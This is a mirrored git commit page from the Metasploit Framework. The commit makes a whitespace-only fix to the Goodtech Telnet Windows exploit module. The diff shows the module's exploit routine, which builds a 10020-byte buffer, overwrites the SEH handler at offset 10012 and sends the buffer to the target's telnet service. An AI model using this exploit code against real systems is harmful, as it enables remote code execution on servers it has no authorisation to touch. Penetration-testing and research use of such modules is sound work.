1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

fixed MC spacing

git-svn-id: file:///home/svn/framework3/trunk@4118 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Matt Miller 2006-11-09 17:32:56 +00:00
parent e2a78bc758
commit 364df6eac1

View File

@ -50,15 +50,16 @@ class Exploits::Windows::Misc::Goodtech_Telnet < Msf::Exploit::Remote
connect
sploit = Rex::Text.rand_text_english(10020, payload_badchars)
seh = generate_seh_payload(target.ret)
sploit[10012, seh.length] = seh
seh = generate_seh_payload(target.ret)
sploit[10012, seh.length] = seh
print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n\r\n")
handler
disconnect
disconnect
end
end